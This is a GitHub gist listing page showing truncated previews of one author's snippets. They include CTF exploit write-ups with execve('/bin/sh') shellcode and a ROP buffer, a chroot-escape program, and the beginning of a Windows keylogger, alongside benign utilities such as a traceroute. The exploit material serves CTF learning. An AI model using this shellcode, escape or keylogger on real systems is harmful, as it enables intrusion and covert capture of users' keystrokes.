Skip to content

Instantly share code, notes, and snippets.

View inaz2's full-sized avatar

inaz2

109 followers · 5 following
View GitHub Profile
@inaz2
inaz2 / oh_my_scanf.py
Last active August 29, 2015 14:15
writeup of Advent Calendar CTF 2014 oh_my_scanf http://adctf2014.katsudon.org/
from roputils import *
p = Proc('./oh_my_scanf')
#p = Proc(host='pwnable.katsudon.org', port=32100)
sc = Shellcode('i386')
buf = 'A' * 28
buf += p32(0x80483e0) # push esp; ret
buf += sc.xor(sc.exec_shell(), '\t\n\v\f\r ') # elliminate white-space characters for scanf("%s") attack
@inaz2
inaz2 / result.txt
Last active August 29, 2015 14:16
a minimum test of uninitialized pointer use (CWE-824)
$ uname -a
Linux vm-ubuntu64 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04.1 LTS
Release: 14.04
Codename: trusty
@inaz2
inaz2 / escape.c
Created April 29, 2015 12:09
escape from chroot on Ubuntu 14.04.1
/* http://www.gcd.org/blog/2007/09/132/ */
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/stat.h>
#include <errno.h>
#define BUFMAX 256
int main(int argc, char *argv[]) {
@inaz2
inaz2 / traceroute.py
Last active June 26, 2024 14:19
Python implementation of traceroute
# references:
# Learning by doing: Writing your own traceroute in 8 easy steps (Ksplice Blog)
# https://blogs.oracle.com/ksplice/entry/learning_by_doing_writing_your
import sys
import socket
def traceroute(dest_addr, max_hops=30, timeout=0.2):
proto_icmp = socket.getprotobyname('icmp')
proto_udp = socket.getprotobyname('udp')
@inaz2
inaz2 / keylogger.py
Last active December 21, 2019 16:38
Windows keylogger by Python ctypes (Cygwin)
import sys
import time
from ctypes import *
GetAsyncKeyState = cdll.user32.GetAsyncKeyState
special_keys = {0x08: "BS", 0x09: "Tab", 0x0d: "Enter", 0x10: "Shift", 0x11: "Ctrl", 0x12: "Alt", 0x14: "CapsLock", 0x1b: "Esc", 0x20: "Space", 0x2e: "Del"}
# reset key states
for i in xrange(256):
@inaz2
inaz2 / enumwindows.py
Last active June 16, 2024 11:13
EnumWindows + GetWindowText by Python ctypes (Cygwin)
from ctypes import *
EnumWindows = cdll.user32.EnumWindows
EnumWindowsProc = CFUNCTYPE(c_bool, POINTER(c_int), POINTER(c_int))
GetWindowText = cdll.user32.GetWindowTextW
GetWindowTextLength = cdll.user32.GetWindowTextLengthW
IsWindowVisible = cdll.user32.IsWindowVisible
def enum_func(hwnd, lParam):
if IsWindowVisible(hwnd):
@inaz2
inaz2 / brainfuck.s
Last active March 15, 2020 14:58
x86 brainfuck interpreter
/* brainfuck.s */
.intel_syntax noprefix
.globl _start
_start:
lea edx, mem
lea esi, bfcode
loop:
mov al, [esi]
@inaz2
inaz2 / exploit.py
Last active August 29, 2015 14:27
セキュリティ・キャンプ2015 出張 CTF for ビギナーズ 川柳 (Pwn 300) write-up / https://github.com/rekkusu/seccamp2015ctf
import struct
import socket
from telnetlib import Telnet
senryu1 = '\x8d\x48\x19\x31\xdb'
senryu2 = '\x6a\x7f\x5a\x6a\x03\x58\x90'
senryu3 = '\xcd\x80\xff\xe1\x90'
# execve("/bin/sh", {"/bin/sh", NULL}, NULL)
shellcode = '\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80'
@inaz2
inaz2 / megrepper.html
Last active August 30, 2015 07:31
目grep in the browser (HTML5 Canvas + File API)
<!DOCTYPE html>
<html>
<meta charset="UTF-8">
<title>megrepper</title>
<body>
<canvas id="canvas"></canvas>
<div style="position: fixed; left: 160px; display: inline-block;">
<h1>megrepper</h1>
<pre id="edit" style="width: 40em; margin: 0; background-color: #eeeeee">Drag &amp; drop a file on page</pre>
</div>
@inaz2
inaz2 / highresclock.html
Last active September 3, 2015 07:37
High-resolution clock using requestAnimationFrame()
<!DOCTYPE html>
<html>
<title>High-resolution clock</title>
<h1></h1>
<canvas id="canvas" width="400" height="400"></canvas>
<script>
(function() {
var requestAnimationFrame = window.requestAnimationFrame || window.mozRequestAnimationFrame ||
window.webkitRequestAnimationFrame || window.msRequestAnimationFrame;